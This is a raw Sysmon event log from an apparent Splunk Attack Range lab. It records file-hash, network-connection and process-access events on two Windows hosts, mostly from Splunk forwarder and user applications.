Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5ABCFEB02D35775FCE464C5125AD3011,SHA256=2508540170867C4C81217212CDEA424E1846AF80651FC742DD35ACB5A574DCA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048160Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:10.407{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FC59F17CBEF181C77CEF6AFC3DF41ABB,SHA256=D29BCE06721D7E8D9CC7C2CB679E1DBAAE917A818DCFD3DC0FE8EB7E8E5E1254,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:01.639{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51008-false10.0.1.12-8000- 23542300x80000000000000001048172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:11.891{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE16D3E926357C80C34372770E62CC86,SHA256=72385BD428B69FEE5AD0E4C2FE4094CF6AAE640A7BF0B5BC1C0AA73E6352F527,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807337Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:11.945{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A9F9EA652798E7D9855570D47B3022E,SHA256=A32984F45C10B584C2FC116A4C30EA0F1C5DDE7DDD6ECB18EFCAD5159E73B144,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:12.892{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14C7CF9FA928B0B43A004D3682E2F7D0,SHA256=ABC67DAC76D693F703B3791CE43760D0FEFC96D41012A01B0D3005A8D0881DB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807341Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:12.961{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C17B1ECB8F1977918D2F84218F75C51,SHA256=A21C16C411F645770F99AB7711855A73A6D9EECCB12DB566D86CE97BC40F336B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807340Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:12.679{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=175C9FA0BF0ADBB0A96DEA26772075A9,SHA256=A6BFF3E7AA6793127A0CB5C45288A673BAF666B56675981477EBF496BDA0BF1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807339Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:12.679{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B379E6521A8CDF3E4E171AC1575CCB30,SHA256=939182739A5EF34F24BBE1ECF501F8651AB18DC188700691B23FAAB175A13080,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807338Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:11.276{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-33292-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000807343Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:13.961{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58BE54D3D1538F66739570C18F03D408,SHA256=A9FFA1F4F3BFC30C34E97C124DF4D50DF9BABB491F58FFCDC73020A9302E6AAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:13.907{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=087893DE1391A8B41A2C6A76C57215D8,SHA256=A02DA96E8C7F4ED76AC83408584B32C2CA3D42B43A465D365CC510755B0F6059,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807342Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:11.810{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57249-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x80000000000000001048177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:14.922{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F0E0A01136F45B9E4BEA4CD381C430E,SHA256=008C53F48E97E33475E1E2557FACD75E58CE9488C4EC81822D61FA53661D6738,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:14.323{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=F78E2DB5EB964255D138257A6663505D,SHA256=4603A96C0B4D40842F34E6571D38FCBC3523A7B032B4CB69F79B3488DF86DE62,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:05.206{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57249-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001048180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:15.937{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E54ABB568BF1EA386BD691418B58C62C,SHA256=90EB02B00D3841B217CD8B93FD7717AA431E5076F6EC5CDF19058557CAEC8690,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807345Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:13.390{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57250-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807344Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:15.018{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3430546D3D11E9F5CF4190576881211,SHA256=4630B33AB101D03D52140BEBD540715FFA3FAEA55074198BE917AF8A99113FDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:15.406{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=211494739029E76066F63A62A8DA8075,SHA256=8F1710C66B605BB633773D1263556F03F99B03B11BF4309EECB53DD28CECE7EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:15.406{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B745DA195616D4A8D272BC6AE9FF05CC,SHA256=53BF429ACE66C6D37B9C70DDEED133FD146E60675C9B1E0C42A37BFB431E4A28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048182Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:16.970{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FF803268FB4F50340E7FAEFD11093C1,SHA256=A43509EF69C2B1375EF2E60EB870304AF5E9836DEB2D95515C0B18A3042BE849,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:07.599{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51009-false10.0.1.12-8000- 23542300x8000000000000000807346Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:16.034{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A905DB4A6D065855BF7338145DF96569,SHA256=9161FD9A31DC9AF16FD03993D7A9F98A3055878A0DC1DAC7351EE17AEC53BDF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048185Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:17.988{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=738A8BDA3810ED9C278107558BCA5383,SHA256=4F1B9C2DBDAF1E2DB99C4BB8666612737A9F4C6905A49EF40A7C217388981F1A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048184Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:07.937{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51010-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001048183Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:07.937{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51010-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x8000000000000000807347Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:17.050{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8C461C96D3C07ABD4B5B61D6BAF0229,SHA256=49DCF08DF9F373EE6EB37E0CE13918A3C649F70948246F6D5496794F547B7ABF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807348Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:18.065{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C5609F67871A075D76668EA38D10EA,SHA256=52A88B405CC0B7F180A371A50F460EAC83685E2D42A2948AF0E3C40731FD7343,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:18.266{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807349Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:19.065{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E326A128EAA0234BDB95F3C81F571F81,SHA256=2422F33D05BC57068EAE2869D704E13EA05AE417C330B6A4EA0C0FA87C991826,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:19.002{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF0472CBD7E63C16AF3B6F7F890074D1,SHA256=7A5BB5F63B4425A37E9D9778067D50E635EAB76FD4FD0FF302C143AA297123F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:20.017{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BA1B32AF28F02C5D3611E83CB8EB6CF,SHA256=CDCA32B628AEC5F0FB93AC3ADA6ECC34876604F8FB4977DF65E6A3AFE5C33BAD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807352Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:19.291{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57251-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807351Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:20.456{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807350Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:20.081{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DDF6F99FF515F7040A42DEB8F017710,SHA256=6A2E5179517D216315ED04943998A2DFC364E5041C2D8E980DD56062D109A497,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:12.695{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51011-false10.0.1.12-8000- 23542300x80000000000000001048190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:21.331{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=D9423C3129691C7A4B731F556C5D4A32,SHA256=95D4AF665AD4C9D191BB63890AB52B17A63BAC67CAFFF79E1847A492A9638110,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:21.031{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5855AA7BD4C6FC4308388F879E3E925C,SHA256=8F942B4B54884760FA33D4C2FB7F536DBD25A4D024D4623DF6110D4AF7CFE043,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807354Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:20.588{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57252-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000807353Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:21.096{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1DBB8F71D0223131FB84778EDEFA0A,SHA256=8C5F88E1F2BF26287445EDD67893E6EC80F14596BB58CE56CA423345F568E7AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:22.045{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BBFD472750504262E37069570D7271E,SHA256=1ADB18BB815BE2AD78C4EFFBD8F851A61060527D1B1F9BD3A596312C18DEC8E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807355Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:22.112{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B862D0180DA0E4682858610104B01E30,SHA256=3C68508A164C16FB923CA39B5715A4A932CB2B9884E47919C2CBBD073B3C9756,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807356Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:23.128{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E17CD2596D6EBEAB6A9DBB2230D9B5D4,SHA256=283D3040C607C7749221ED4BEF343465CF6CA776F35E19279F37F05ED718A65B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:23.062{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19C70914B0B5B1DBA8BA55FCB38B5241,SHA256=F9852F5CA3811D1C62391EAFDF4A442B8C99086EE9BEED72E7363936A4D49D68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:24.096{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CBC7E2EAEEA115D3332D2015E1D6B43C,SHA256=4F113E4AC46842E9451564657B162859599D3D3512D0FCB93BD4B8A77D02CD30,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807384Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47C-60EB-6D79-00000000D001}3140C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807383Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807382Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807381Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.956{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807380Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 